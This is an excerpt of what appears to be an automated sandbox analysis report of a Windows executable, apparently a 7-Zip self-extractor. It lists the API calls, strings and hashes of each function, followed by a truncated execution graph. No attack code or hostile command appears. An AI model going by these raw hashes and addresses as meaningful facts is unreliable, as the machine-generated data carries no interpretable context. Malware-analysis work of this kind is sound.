                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                    • String ID:
                                                    • API String ID: 1900162674-0
                                                    • Opcode ID: 3d0b0b5187ec293b70e023c8666c61d0dad0b7b0987e9bc6d8a6bccd5fe4712f
                                                    • Instruction ID: 589bcbddd4421325bea5a8b1de4240acc0829fea160f6e993b9073ae00d0bb15
                                                    • Opcode Fuzzy Hash: 3d0b0b5187ec293b70e023c8666c61d0dad0b7b0987e9bc6d8a6bccd5fe4712f
                                                    • Instruction Fuzzy Hash: 54118272940219AFEB108F58DC88AEBB7BCEF44358F05827AAC15A7291DB749D44CF54
                                                    APIs
                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00418850
                                                      • Part of subcall function 0041879D: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 004187CC
                                                      • Part of subcall function 0041879D: ___AdjustPointer.LIBCMT ref: 004187E7
                                                    • _UnwindNestedFrames.LIBCMT ref: 00418865
                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00418876
                                                    • CallCatchBlock.LIBVCRUNTIME ref: 0041889E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                    • String ID:
                                                    • API String ID: 737400349-0
                                                    • Opcode ID: 6466acd8f6e2a874f5cc5d39f87c4e52791361ed61d3c04f63af72025866aa28
                                                    • Instruction ID: 36b014ceb4145293d2653aad7e410f7cb69a81bc23da82c26d473a3497ccf736
                                                    • Opcode Fuzzy Hash: 6466acd8f6e2a874f5cc5d39f87c4e52791361ed61d3c04f63af72025866aa28
                                                    • Instruction Fuzzy Hash: 3B012D32100109BBDF116E96CC45EEB3B6AFF98758F44441DFE0856121D73AE8A19BA4
                                                    APIs
                                                    • ScreenToClient.USER32(?,?), ref: 00407629
                                                    • GetClientRect.USER32(?,?), ref: 0040763B
                                                    • PtInRect.USER32(?,?,?), ref: 0040764A
                                                    • CallNextHookEx.USER32(?,?,?), ref: 0040766C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ClientRect$CallHookNextScreen
                                                    • String ID:
                                                    • API String ID: 1596363829-0
                                                    • Opcode ID: 3801a53d40516981aaf044842e769f6fab1b7c74d9eadb141162595fcba978aa
                                                    • Instruction ID: 301b4600e396e727d21cde9f58a3ec7f9b1242c7084d47dd03052232aa3ad0ee
                                                    • Opcode Fuzzy Hash: 3801a53d40516981aaf044842e769f6fab1b7c74d9eadb141162595fcba978aa
                                                    • Instruction Fuzzy Hash: C901A131A00005EFDB209F98CC48DEB7B66FF54394B04847AE917E21B2D735E850DB59
                                                    APIs
                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 00407017
                                                    • CreateFontIndirectW.GDI32(?), ref: 0040702D
                                                    • GetDlgItem.USER32(?,000004B5), ref: 00407041
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040704D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: CreateFontIndirectItemMessageObjectSend
                                                    • String ID:
                                                    • API String ID: 2001801573-0
                                                    • Opcode ID: 59dc5abfe602d22e33d1af4c5925bfcd79e5149069da3d30ac52e00f8d0f0b8b
                                                    • Instruction ID: f5e65830561f8ab3637ac77171e914c0dc17c91b326b23493439a436ba14f9f4
                                                    • Opcode Fuzzy Hash: 59dc5abfe602d22e33d1af4c5925bfcd79e5149069da3d30ac52e00f8d0f0b8b
                                                    • Instruction Fuzzy Hash: EBF0B471940304ABD7306BE4DD09FCBBFAC9B44B45F004135BE01A21E0D7B4E4048A59
                                                    APIs
                                                    • SuspendThread.KERNEL32(00000288), ref: 004060A1
                                                    • ResumeThread.KERNEL32(00000288), ref: 004060BF
                                                    • TerminateThread.KERNEL32(00000288,00000016), ref: 004060D4
                                                    • EndDialog.USER32(?,00000000), ref: 004060DF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Thread$DialogResumeSuspendTerminate
                                                    • String ID:
                                                    • API String ID: 714563131-0
                                                    • Opcode ID: 5bbc28acddb10463f09857c773cc69307091f21338570d11145be6f95595fb23
                                                    • Instruction ID: 8fab632199d0908ba33f8da4b7f56d172b7c011a21c29bfc308f8df5ebe47e73
                                                    • Opcode Fuzzy Hash: 5bbc28acddb10463f09857c773cc69307091f21338570d11145be6f95595fb23
                                                    • Instruction Fuzzy Hash: D0F08271682120A7D3319F50AC4879A7A54AF59705F0280B6E403B21E0C37948618A9D
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00402F8A
                                                    • GetWindowRect.USER32(?,?), ref: 00402F9E
                                                    • ScreenToClient.USER32(00000000,?), ref: 00402FA6
                                                    • ScreenToClient.USER32(00000000,?), ref: 00402FB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ClientScreen$ParentRectWindow
                                                    • String ID:
                                                    • API String ID: 2099118873-0
                                                    • Opcode ID: 440b82a22d2b631b071771dd8f3ba710ae7b9669c0b65887d6e1995d8e1cea06
                                                    • Instruction ID: d539694b179019102c5b4c06d93f04b0f2a1111d6f57eb851fde0fc9aed182da
                                                    • Opcode Fuzzy Hash: 440b82a22d2b631b071771dd8f3ba710ae7b9669c0b65887d6e1995d8e1cea06
                                                    • Instruction Fuzzy Hash: CBE01A7668024ABBDB001BE2ECC8C9B7B6CFB853953008475F90981120D775D8018A64
                                                    APIs
                                                      • Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000B), ref: 00405A61
                                                      • Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000C), ref: 00405A68
                                                    • GetSystemMetrics.USER32(00000007), ref: 00405B61
                                                    • GetSystemMetrics.USER32(00000007), ref: 00405B72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: 100%%
                                                    • API String ID: 4116985748-568723177
                                                    • Opcode ID: 334c3224572854bdfb44f3f891c5a4032f2d03a709a653b2b1f191988218ec54
                                                    • Instruction ID: 98887543d5e3c7041bc36966c58c694e7cd41ec7928b3b5d14a60619b90ee756
                                                    • Opcode Fuzzy Hash: 334c3224572854bdfb44f3f891c5a4032f2d03a709a653b2b1f191988218ec54
                                                    • Instruction Fuzzy Hash: 09315E71600A099FDB20DF6AD9429ABBBF5EB50318B00052EE442A26A2D778F945CF59
                                                    APIs
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(004049F1,?,GUIFlags,00000000,004049F1,004049F1,?,00404DB8,004049F1,00421300,?,004049F1), ref: 00404D2E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _wtol
                                                    • String ID: -$GUIFlags
                                                    • API String ID: 2131799477-4029742170
                                                    • Opcode ID: 140e05111dc0fecc70a0b446918e2fdb5982cc56c53a92521d4623001a9e10b1
                                                    • Instruction ID: faf9d7bdff0eaf02d7dc1ff6e6f00bb287b80595fff55fcde92ab683e3f4d987
                                                    • Opcode Fuzzy Hash: 140e05111dc0fecc70a0b446918e2fdb5982cc56c53a92521d4623001a9e10b1
                                                    • Instruction Fuzzy Hash: AF11E9F6600115AEEB256B08E4156BAB395DFD4751FA08037FF817B2C4E6B55E83824C
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Itemwsprintf
                                                    • String ID: (%d%s)
                                                    • API String ID: 449186261-2087557067
                                                    • Opcode ID: 5a513b844bddf83d55a32313bea3597a9b6972254d320041c285dc154bd6c4a3
                                                    • Instruction ID: 0855069b041fb52eadb741d1665d5d0dd14bf4d496d4cbc0dbf3efc898ddedf2
                                                    • Opcode Fuzzy Hash: 5a513b844bddf83d55a32313bea3597a9b6972254d320041c285dc154bd6c4a3
                                                    • Instruction Fuzzy Hash: 42F04471C00219AFCF107B95DC4AEDE77BCAF04308F1044ABB512A1192DA79A6689B59
                                                    APIs
                                                      • Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000B), ref: 00405A61
                                                      • Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000C), ref: 00405A68
                                                    • GetSystemMetrics.USER32(00000007), ref: 00405C59
                                                    • GetSystemMetrics.USER32(00000007), ref: 00405C6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem
                                                    • String ID: Z@
                                                    • API String ID: 4116985748-3535364306
                                                    • Opcode ID: 16590995e6bab4cde6838fa79791c1966523c720bf2d08826403a0532f7ff5e9
                                                    • Instruction ID: f59158490b789910cfc2f92da0aea55616d6536ebe6ab1582d29dafe3c8d862e
                                                    • Opcode Fuzzy Hash: 16590995e6bab4cde6838fa79791c1966523c720bf2d08826403a0532f7ff5e9
                                                    • Instruction Fuzzy Hash: C9F0E272E007009FD720EFB8ED49A5A37F4EB14714F00067EA402A2295DA74E9048E98
                                                    APIs
                                                    • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404E56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: 7-Zip SFX$Could not allocate memory
                                                    • API String ID: 2030045667-3806377612
                                                    • Opcode ID: b23f3dda782bc17cf5e308c8d3915cc8d3864c9183856bd16fd2eaca64889d71
                                                    • Instruction ID: a1cde3b1e70dd50e48c68ae9573d4bf36166630aaf9194b1d0f5351cb2fcf2fd
                                                    • Opcode Fuzzy Hash: b23f3dda782bc17cf5e308c8d3915cc8d3864c9183856bd16fd2eaca64889d71
                                                    • Instruction Fuzzy Hash: 7AB012F0BC130032E10013604C07FC111404758F07F5084527104A80D1C6F820D0101D

                                                    Execution Graph

                                                    Execution Coverage:3.1%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.3%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:52
                                                    execution_graph 102311 85e485 102314 85b940 102311->102314 102315 85b95b 102314->102315 102316 8a0493 102315->102316 102317 8a0445 102315->102317 102337 85b980 102315->102337 102385 8d6029 225 API calls 2 library calls 102316->102385 102320 8a044f 102317->102320 102323 8a045c 102317->102323 102317->102337 102383 8d64ba 225 API calls 102320->102383 102336 85bc50 102323->102336 102384 8d6957 225 API calls 2 library calls 102323->102384 102326 85be10 39 API calls 102326->102337 102327 86e6c0 39 API calls 102327->102337 102328 8a0726 102328->102328 102331 85bc7e 102333 8a066f 102392 8d6393 59 API calls 102333->102392 102336->102331 102393 8c3d0b 59 API calls __wsopen_s 102336->102393 102337->102326 102337->102327 102337->102331 102337->102333 102337->102336 102345 85f1e0 102337->102345 102370 85acbd 39 API calls 102337->102370 102371 86e67a 39 API calls 102337->102371 102372 86a955 225 API calls 102337->102372 102373 870592 5 API calls __Init_thread_wait 102337->102373 102374 86bb11 102337->102374 102379 8703f3 29 API calls __onexit 102337->102379 102380 870548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102337->102380 102381 86f33d 59 API calls 102337->102381 102382 86f1a4 225 API calls 102337->102382 102386 85a35b 102337->102386 102390 8afd46 8 API calls 102337->102390 102391 85ad69 8 API calls __fread_nolock 102337->102391 102366 85f216 messages 102345->102366 102346 870548 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102346->102366 102347 8a52b2 102403 8c3d0b 59 API calls __wsopen_s 102347->102403 102348 87012b 8 API calls 102348->102366 102350 860535 102362 85f33d messages 102350->102362 102399 85ad69 8 API calls __fread_nolock 102350->102399 102352 8a4c62 102352->102362 102398 85ad69 8 API calls __fread_nolock 102352->102398 102353 8a51e1 102402 8c3d0b 59 API calls __wsopen_s 102353->102402 102357 870592 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102357->102366 102361 85ae03 8 API calls 102361->102366 102362->102337 102364 8703f3 29 API calls pre_c_initialization 102364->102366 102365 8a509c 102400 8c3d0b 59 API calls __wsopen_s 102365->102400 102366->102346 102366->102347 102366->102348 102366->102350 102366->102352 102366->102353 102366->102357 102366->102361 102366->102362 102366->102364 102366->102365 102368 85f94e messages 102366->102368 102369 85ad69 8 API calls 102366->102369 102394 860830 225 API calls 2 library calls 102366->102394 102395 860cf0 40 API calls messages 102366->102395 102396 8d7db9 41 API calls __wsopen_s 102366->102396 102397 8d7ef8 54 API calls 102366->102397 102401 8c3d0b 59 API calls __wsopen_s 102368->102401 102369->102366 102370->102337 102371->102337 102372->102337 102373->102337 102404 87012b 102374->102404 102376 86bb1e 102413 85a1d4 102376->102413 102379->102337 102380->102337 102381->102337 102382->102337 102383->102323 102384->102336 102385->102337 102387 85a369 102386->102387 102388 85a36f 102386->102388 102387->102388 102434 85ad69 8 API calls __fread_nolock 102387->102434 102388->102337 102390->102337 102391->102337 102392->102336 102393->102328 102394->102366 102395->102366 102396->102366 102397->102366 102398->102362 102399->102362 102400->102368 102401->102362 102402->102362 102403->102362 102405 870130 ___std_exception_copy 102404->102405 102406 87014a 102405->102406 102409 87014c 102405->102409 102419 8751fd 7 API calls 2 library calls 102405->102419 102406->102376 102408 8709bd 102421 8735f4 RaiseException 102408->102421 102409->102408 102420 8735f4 RaiseException 102409->102420 102411 8709da 102411->102376 102414 85a1e3 _wcslen 102413->102414 102422 87015b 102414->102422 102416 85a20b __fread_nolock 102417 87012b 8 API calls 102416->102417 102418 85a221 102417->102418 102418->102337 102419->102405 102420->102408 102421->102411 102423 87012b ___std_exception_copy 102422->102423 102424 87014a 102423->102424 102427 87014c 102423->102427 102431 8751fd 7 API calls 2 library calls 102423->102431 102424->102416 102426 8709bd 102433 8735f4 RaiseException 102426->102433 102427->102426 102432 8735f4 RaiseException 102427->102432 102429 8709da 102429->102416 102431->102423 102432->102426 102433->102429 102434->102388 102435 851044 102440 852c6f 102435->102440 102477 854045 102440->102477 102444 852ce6 102487 85ae03 102444->102487 102447 85ae03 8 API calls 102448 852cfa 102447->102448 102449 85ae03 8 API calls 102448->102449 102450 852d04 102449->102450 102451 85ae03 8 API calls 102450->102451 102452 852d42 102451->102452 102453 85ae03 8 API calls 102452->102453 102454 852e0e 102453->102454 102492 85540c 102454->102492 102538 85409e 102477->102538 102480 85409e 8 API calls 102481 85407d 102480->102481 102482 85ae03 8 API calls 102481->102482 102483 854089 102482->102483 102545 857467 102483->102545 102485 852ca5 102486 852a8d 6 API calls 102485->102486 102486->102444 102488 87015b 8 API calls 102487->102488 102489 85ae18 102488->102489 102490 87012b 8 API calls 102489->102490 102491 852cf0 102490->102491 102491->102447 102493 85ae03 8 API calls 102492->102493 102494 85541c 102493->102494 102495 85ae03 8 API calls 102494->102495 102496 855424 102495->102496 102559 8570c5 102496->102559 102499 8570c5 8 API calls 102500 855434 102499->102500 102501 85ae03 8 API calls 102500->102501 102502 85543f 102501->102502 102503 87012b 8 API calls 102502->102503 102504 852e18 102503->102504 102505 852af5 102504->102505 102506 852b03 102505->102506 102539 85ae03 8 API calls 102538->102539 102540 8540a9 102539->102540 102541 85ae03 8 API calls 102540->102541 102542 8540b1 102541->102542 102543 85ae03 8 API calls 102542->102543 102544 854073 102543->102544 102544->102480 102546 857477 _wcslen 102545->102546 102547 8955fc 102545->102547 102550 8574b2 102546->102550 102551 85748d 102546->102551 102558 858635 8 API calls __fread_nolock 102547->102558 102549 895605 102549->102549 102553 87012b 8 API calls 102550->102553 102557 857851 8 API calls 102551->102557 102555 8574be 102553->102555 102554 857495 __fread_nolock 102554->102485 102556 87015b 8 API calls 102555->102556 102556->102554 102557->102554 102558->102549 102560 85ae03 8 API calls 102559->102560 102561 85542c 102560->102561 102561->102499 102568 88944a 102569 889457 102568->102569 102573 88946f 102568->102573 102625 882b68 20 API calls _abort 102569->102625 102571 88945c 102626 882aac 26 API calls _strftime 102571->102626 102574 8894ca 102573->102574 102582 889467 102573->102582 102627 890117 21 API calls 2 library calls 102573->102627 102588 87dca5 102574->102588 102577 8894e2 102595 888f82 102577->102595 102579 8894e9 102580 87dca5 __fread_nolock 26 API calls 102579->102580 102579->102582 102581 889515 102580->102581 102581->102582 102583 87dca5 __fread_nolock 26 API calls 102581->102583 102584 889523 102583->102584 102584->102582 102585 87dca5 __fread_nolock 26 API calls 102584->102585 102586 889533 102585->102586 102587 87dca5 __fread_nolock 26 API calls 102586->102587 102587->102582 102589 87dcc6 102588->102589 102590 87dcb1 102588->102590 102589->102577 102628 882b68 20 API calls _abort 102590->102628 102592 87dcb6 102629 882aac 26 API calls _strftime 102592->102629 102594 87dcc1 102594->102577 102596 888f8e __FrameHandler3::FrameUnwindToState 102595->102596 102597 888fae 102596->102597 102598 888f96 102596->102598 102600 889074 102597->102600 102605 888fe7 102597->102605 102696 882b55 20 API calls _abort 102598->102696 102703 882b55 20 API calls _abort 102600->102703 102602 888f9b 102697 882b68 20 API calls _abort 102602->102697 102603 889079 102704 882b68 20 API calls _abort 102603->102704 102607 88900b 102605->102607 102608 888ff6 102605->102608 102630 885497 EnterCriticalSection 102607->102630 102698 882b55 20 API calls _abort 102608->102698 102610 889003 102705 882aac 26 API calls _strftime 102610->102705 102612 889011 102615 88902d 102612->102615 102616 889042 102612->102616 102613 888ffb 102699 882b68 20 API calls _abort 102613->102699 102700 882b68 20 API calls _abort 102615->102700 102631 889095 102616->102631 102618 888fa3 __wsopen_s 102618->102579 102621 889032 102701 882b55 20 API calls _abort 102621->102701 102622 88903d 102702 88906c LeaveCriticalSection __wsopen_s 102622->102702 102625->102571 102626->102582 102627->102574 102628->102592 102629->102594 102630->102612 102632 8890bf 102631->102632 102633 8890a7 102631->102633 102635 889429 102632->102635 102638 889104 102632->102638 102715 882b55 20 API calls _abort 102633->102715 102745 882b55 20 API calls _abort 102635->102745 102636 8890ac 102716 882b68 20 API calls _abort 102636->102716 102641 88910f 102638->102641 102642 8890b4 102638->102642 102649 88913f 102638->102649 102640 88942e 102746 882b68 20 API calls _abort 102640->102746 102717 882b55 20 API calls _abort 102641->102717 102642->102622 102645 88911c 102747 882aac 26 API calls _strftime 102645->102747 102646 889114 102718 882b68 20 API calls _abort 102646->102718 102650 889158 102649->102650 102651 88919a 102649->102651 102652 88917e 102649->102652 102650->102652 102685 889165 102650->102685 102722 883b70 102651->102722 102719 882b55 20 API calls _abort 102652->102719 102654 889183 102720 882b68 20 API calls _abort 102654->102720 102659 88918a 102721 882aac 26 API calls _strftime 102659->102721 102660 889303 102663 889379 102660->102663 102666 88931c GetConsoleMode 102660->102666 102665 88937d ReadFile 102663->102665 102664 8891ba 102667 882d18 _free 20 API calls 102664->102667 102668 8893f1 GetLastError 102665->102668 102669 889397 102665->102669 102666->102663 102670 88932d 102666->102670 102671 8891c1 102667->102671 102672 8893fe 102668->102672 102673 889355 102668->102673 102669->102668 102674 88936e 102669->102674 102670->102665 102675 889333 ReadConsoleW 102670->102675 102676 8891cb 102671->102676 102677 8891e6 102671->102677 102743 882b68 20 API calls _abort 102672->102743 102693 889195 __fread_nolock 102673->102693 102740 882b32 20 API calls __dosmaperr 102673->102740 102689 8893bc 102674->102689 102690 8893d3 102674->102690 102674->102693 102675->102674 102680 88934f GetLastError 102675->102680 102735 882b68 20 API calls _abort 102676->102735 102737 889774 102677->102737 102680->102673 102681 882d18 _free 20 API calls 102681->102642 102683 8891d0 102736 882b55 20 API calls _abort 102683->102736 102684 889403 102744 882b55 20 API calls _abort 102684->102744 102706 88fbee 102685->102706 102741 888db1 31 API calls 2 library calls 102689->102741 102692 8893ea 102690->102692 102690->102693 102742 888bf1 29 API calls __fread_nolock 102692->102742 102693->102681 102695 8893ef 102695->102693 102696->102602 102697->102618 102698->102613 102699->102610 102700->102621 102701->102622 102702->102618 102703->102603 102704->102610 102705->102618 102707 88fc08 102706->102707 102708 88fbfb 102706->102708 102711 88fc14 102707->102711 102749 882b68 20 API calls _abort 102707->102749 102748 882b68 20 API calls _abort 102708->102748 102710 88fc00 102710->102660 102711->102660 102713 88fc35 102750 882aac 26 API calls _strftime 102713->102750 102715->102636 102716->102642 102717->102646 102718->102645 102719->102654 102720->102659 102721->102693 102723 883bae 102722->102723 102727 883b7e _abort 102722->102727 102752 882b68 20 API calls _abort 102723->102752 102724 883b99 RtlAllocateHeap 102726 883bac 102724->102726 102724->102727 102729 882d18 102726->102729 102727->102723 102727->102724 102751 8751fd 7 API calls 2 library calls 102727->102751 102730 882d23 RtlFreeHeap 102729->102730 102734 882d4c __dosmaperr 102729->102734 102731 882d38 102730->102731 102730->102734 102753 882b68 20 API calls _abort 102731->102753 102733 882d3e GetLastError 102733->102734 102734->102664 102735->102683 102736->102693 102754 8896db 102737->102754 102740->102693 102741->102693 102742->102695 102743->102684 102744->102693 102745->102640 102746->102645 102747->102642 102748->102710 102749->102713 102750->102710 102751->102727 102752->102726 102753->102733 102763 885714 102754->102763 102756 8896ed 102757 8896f5 102756->102757 102758 889706 SetFilePointerEx 102756->102758 102776 882b68 20 API calls _abort 102757->102776 102760 88971e GetLastError 102758->102760 102762 8896fa 102758->102762 102777 882b32 20 API calls __dosmaperr 102760->102777 102762->102685 102764 885721 102763->102764 102766 885736 102763->102766 102778 882b55 20 API calls _abort 102764->102778 102771 88575b 102766->102771 102780 882b55 20 API calls _abort 102766->102780 102767 885726 102779 882b68 20 API calls _abort 102767->102779 102769 885766 102781 882b68 20 API calls _abort 102769->102781 102771->102756 102773 88572e 102773->102756 102774 88576e 102782 882aac 26 API calls _strftime 102774->102782 102776->102762 102777->102762 102778->102767 102779->102773 102780->102769 102781->102774 102782->102773 102783 87f04e 102784 87f05a __FrameHandler3::FrameUnwindToState 102783->102784 102785 87f066 102784->102785 102786 87f07b 102784->102786 102802 882b68 20 API calls _abort 102785->102802 102796 8794dd EnterCriticalSection 102786->102796 102789 87f087 102797 87f0bb 102789->102797 102790 87f06b 102803 882aac 26 API calls _strftime 102790->102803 102795 87f076 __wsopen_s 102796->102789 102805 87f0e6 102797->102805 102799 87f0c8 102800 87f094 102799->102800 102825 882b68 20 API calls _abort 102799->102825 102804 87f0b1 LeaveCriticalSection __fread_nolock 102800->102804 102802->102790 102803->102795 102804->102795 102806 87f0f4 102805->102806 102807 87f10e 102805->102807 102829 882b68 20 API calls _abort 102806->102829 102809 87dca5 __fread_nolock 26 API calls 102807->102809 102811 87f117 102809->102811 102810 87f0f9 102830 882aac 26 API calls _strftime 102810->102830 102826 889759 102811->102826 102815 